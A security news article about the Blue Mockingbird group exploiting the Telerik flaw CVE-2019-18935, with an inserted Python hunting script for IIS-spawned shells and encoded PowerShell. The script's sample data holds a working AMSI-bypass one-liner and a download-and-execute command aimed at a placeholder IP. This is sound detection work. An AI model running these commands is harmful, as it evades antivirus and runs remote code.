The Blue Mockingbird group exploits a previously known Telerik flaw

June 22, 2022

A threat group tracked as Blue Mockingbird has been targeting a Telerik UI flaw to compromise servers, mine Monero by hijacking the hosts' compute resources, and install Cobalt Strike beacons. The flaw, CVE-2019-18935, is a critical insecure-deserialisation vulnerability in the Telerik UI for ASP.NET AJAX library that leads to remote code execution (RCE).

To exploit the vulnerability, the adversaries must first obtain the encryption keys that protect Telerik UI's serialised data on the target. Those keys can be recovered by exploiting another flaw in the target web application, or a chain of several.

Researchers noted that plenty of exploitable targets remain, since many web applications embed vulnerable Telerik UI versions. Some of these applications were built during development or testing and were later discontinued or forgotten, yet they are still reachable.

Once attackers hold the encryption keys, they can compile a malicious DLL containing code that runs during deserialisation, and execute it in the context of the IIS worker process, 'w3wp.exe'.


In the recent campaign, Blue Mockingbird used a ready-made proof-of-concept (PoC) exploit that handles the encryption logic and automates the DLL compilation.


The payload delivered in the recent attacks is a Cobalt Strike beacon, a legitimate penetration-testing tool that the attackers use here to run encoded PowerShell commands.

For persistence, the group creates Active Directory Group Policy Objects that push out scheduled tasks; each task's command is stored in a new registry key as base64-encoded PowerShell.

That script uses common AMSI-bypass techniques to evade Windows Defender, and the same bypass is used while downloading and loading a Cobalt Strike DLL into memory.
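As an added example, not part of this article or of any researcher's or vendor's tooling, the Python below hunts process-creation events for the two behaviours described above: the IIS worker process w3wp.exe spawning a shell, which is what the Telerik deserialisation payload produces, and PowerShell launched with a base64-encoded command (or a registry-stored blob) that carries AMSI-tampering strings. The event layout (loosely shaped like flattened Sysmon Event ID 1 records), the sample command lines, the test-net IP and the indicator list are all constructed for the example; powershell.exe's acceptance of any unambiguous prefix of -EncodedCommand and its UTF-16LE-then-base64 encoding are real behaviour.

```python
"""Hunt process-creation events for the behaviours described above:
an IIS worker process (w3wp.exe) spawning a shell, and PowerShell launched
with a base64-encoded command that carries AMSI-bypass strings.
Sample events are constructed for this example, not real telemetry."""
import base64
import binascii
import re

# Strings common to public AMSI-tampering one-liners (assumed indicator list).
AMSI_INDICATORS = ("amsiInitFailed", "AmsiUtils", "AmsiScanBuffer", "amsi.dll")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (and -ec).
ENC_FLAGS = ["ec"] + ["encodedcommand"[:i] for i in range(1, 15)]
ENC_RE = re.compile(
    r"(?i)(?:^|\s)[-/](?:" + "|".join(sorted(ENC_FLAGS, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]+)")

# Constructed payload: a well-known AMSI bypass, encoded the way
# -EncodedCommand expects (UTF-16LE text, then base64).
BYPASS_SCRIPT = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                 ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)")
ENCODED_BYPASS = base64.b64encode(BYPASS_SCRIPT.encode("utf-16le")).decode()
ENCODED_BENIGN = base64.b64encode("Get-Date".encode("utf-16le")).decode()

# Constructed events shaped like flattened Sysmon Event ID 1 records.
SAMPLE_EVENTS = [
    {"Id": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "powershell -nop -w hidden -enc ' + ENCODED_BYPASS + '"'},
    {"Id": 2, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                    + ENCODED_BENIGN},
    {"Id": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"Id": 4, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a')\""},
]


def decode_powershell_b64(blob):
    """Decode a -EncodedCommand / registry blob; None if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand."""
    m = ENC_RE.search(cmdline)
    return decode_powershell_b64(m.group(1)) if m else None


def amsi_indicators(script):
    """Indicator strings present in the (decoded) script, case-insensitively."""
    lowered = script.lower()
    return [s for s in AMSI_INDICATORS if s.lower() in lowered]


def analyze_event(event):
    """Score one event; severity None means nothing suspicious was found."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    decoded = decode_encoded_command(event["CommandLine"])
    finding = {
        "Id": event["Id"],
        "iis_spawned_shell": parent == "w3wp.exe" and image in SHELLS,
        "decoded_command": decoded,
        "amsi_indicators": amsi_indicators(decoded) if decoded else [],
        "severity": None,
    }
    if finding["iis_spawned_shell"] or finding["amsi_indicators"]:
        finding["severity"] = "high"
    elif decoded is not None:
        finding["severity"] = "medium"  # encoded PowerShell, no AMSI strings
    return finding


def hunt(events):
    """Return only the events that scored a severity."""
    return [f for f in map(analyze_event, events) if f["severity"]]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["Id"], f["severity"], f["iis_spawned_shell"], f["amsi_indicators"])
```

Decoding rather than pattern-matching the raw command line matters because the base64 hides the AMSI strings from naive keyword rules; the same `decode_powershell_b64` can be pointed at the registry values that the GPO-deployed scheduled tasks read. The parent/child check is deliberately narrow (w3wp.exe to a shell) so that ordinary IIS activity does not fire it.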

The second-stage executable is XMRig, a standard open-source cryptominer used to mine Monero. Researchers observed that mining was already the group's main objective in 2020, and little has changed since.

The presence of Cobalt Strike, however, makes lateral movement within the compromised network, account takeover and data exfiltration straightforward. It could also open the door for Blue Mockingbird to deploy ransomware.
